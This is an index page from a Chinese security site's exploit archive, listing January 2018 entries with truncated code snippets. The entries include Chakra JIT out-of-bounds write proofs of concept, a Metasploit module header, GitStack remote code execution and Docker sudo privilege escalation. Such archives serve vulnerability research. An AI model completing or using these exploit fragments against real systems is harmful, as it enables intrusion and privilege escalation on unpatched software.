首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  vsserver
  当前位置:主页>安全文章>文章资料>Exploits>列表
Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service
  日期:2018-01-19 15:13:42 点击:0 评论:0
#!/usr/bin/python3 PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. import datetime import socket def main(): Use a de
glibc - 'getcwd()' Local Privilege Escalation
  日期:2018-01-19 15:10:53 点击:0 评论:0
/** This software is provided by the copyright owner as is and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall
Primefaces 5.x - Remote Code Execution (Metasploit)
  日期:2018-01-19 15:08:58 点击:0 评论:0
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::
GitStack 2.3.10 Remote Code Execution
  日期:2018-01-19 15:08:11 点击:0 评论:0
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution# Date: 18.01.2018# Software Link: https://gitstack.com/# Exploit Author: Kacper Szurek# Contact: https://twitter.com/KacperSzurek# Website: https://security.szurek.pl/# Category: remot
Docker Sudo Privilege Escalation
  日期:2018-01-18 15:43:36 点击:3 评论:0
#!/bin/bash# SUDO Docker Privilege Escalation # https://github.com/pyperanger/dockerevil# SELINUX bypass using :z option# https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-labelecho [*] SUDO Docker Privilege Escalation;
Microsoft Edge Chakra JIT Loop Analysis Bug
  日期:2018-01-18 15:43:10 点击:2 评论:0
Microsoft Edge: Chakra: JIT: Loop analysis bug CVE-2018-0777Here's the PoC demonstrating OOB write.function opt(arr, start, end) { for (let i = start; i end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; }}function main() { let ar
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
  日期:2018-01-18 15:42:33 点击:3 评论:0
/* If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not e
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
  日期:2018-01-18 15:41:52 点击:2 评论:0
/* AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as arr[idx ...](). In these cases,
Microsoft Edge Chakra JIT - Out-of-Bounds Write
  日期:2018-01-18 15:41:07 点击:2 评论:0
// Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i 1
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
  日期:2018-01-18 15:40:34 点击:3 评论:0
/* Since the PoC is only triggerable when the DeferParse flag enabled and requires a with statement, I think this is simillar to issue 1310 . PoC: */ // Enable the flag using 'n'.repeat(0x1000) eval(`(function f() { with ({}) { (function () { print(
Microsoft Edge Chakra - Incorrect Scope Handling
  日期:2018-01-18 15:39:38 点击:4 评论:0
// PoC: (function func(arg = function () { print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() { } })(); // Chakra fails to distinguish whether the functi
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type
  日期:2018-01-18 15:39:04 点击:3 评论:0
/* Here's a snippet of the method. bool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result) { if (propertyId == PropertyIds::l
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
  日期:2018-01-18 15:38:13 点击:3 评论:0
/* Let's start with comments in the GlobOpt::TrackIntSpecializedAddSubConstant method. // Track bounds for add or sub with a constant. For instance, consider (b = a + 2). The value of 'b' should track // that it is equal to (the value of 'a') + 2. Th
Seagate Personal Cloud - Multiple Vulnerabilities
  日期:2018-01-17 14:36:37 点击:2 评论:0
# SSD Advisory Seagate Personal Cloud Multiple Vulnerabilities ## Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is the easiest way to stor
D-Link DNS-325 ShareCenter 1.05B03 Shell Upload / Command Injection
  日期:2018-01-16 15:38:22 点击:14 评论:0
########################################################################### ,---.| | |---'|---.,---.,---.,---.|---.,---.,---.. .,---. | | || |`---.| || || || | |`---. ` ` '`---'`---'|---'` '`---'` `---'`---' | Phosphorus Cybersecurity, Inc. ########
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Conditio
  日期:2018-01-16 15:35:28 点击:1 评论:0
#!/usr/local/bin/python Synology Photo Station = 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability Found by: mr_me Tested: 6.8.2-3461 (latest at the time) Vendor Advisory: https://www.synol
OBS studio 20.1.3 - Local Buffer Overflow
  日期:2018-01-16 15:34:44 点击:3 评论:0
author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: OBS-Studio-20.1.3 Local Buffer Overf
Adminer 4.3.1 - Server-Side Request Forgery
  日期:2018-01-16 15:32:31 点击:2 评论:0
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: apparition security Vendor: ============== www.admine
Disk Pulse Enterprise 10.1.18 - Buffer Overflow
  日期:2018-01-16 15:30:51 点击:3 评论:0
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow # Exploit Author: Ahmad Mahfouz # Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CV
SysGauge Server 3.6.18 - Buffer Overflow
  日期:2018-01-16 15:27:10 点击:3 评论:0
# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow # Exploit Author: Ahmad Mahfouz # Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CVE: CVE-2018-5359 # Version:
共591页/11808条记录 首页 1 [2] [3] [4] [5] [6] [7] 下一页 末页
  本月热点文章
·Western Digital WDMyCloud 'm
·Multiple CPUs - 'Spectre' In
·D-Link DNS-320L 'mydlinkBRio
·Microsoft Windows Kernel - '
·Netcore / Netis Routers - UD
·Trend Micro Smart Protection
·Synology Photostation 6.7.2-
·Palo Alto Networks PAN-OS Co
·SysGauge Server 3.6.18 - Den
·Microsoft Windows win32k - U
·Disk Pulse Enterprise 10.1.1
·Oracle MySQL UDF Payload Exe
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved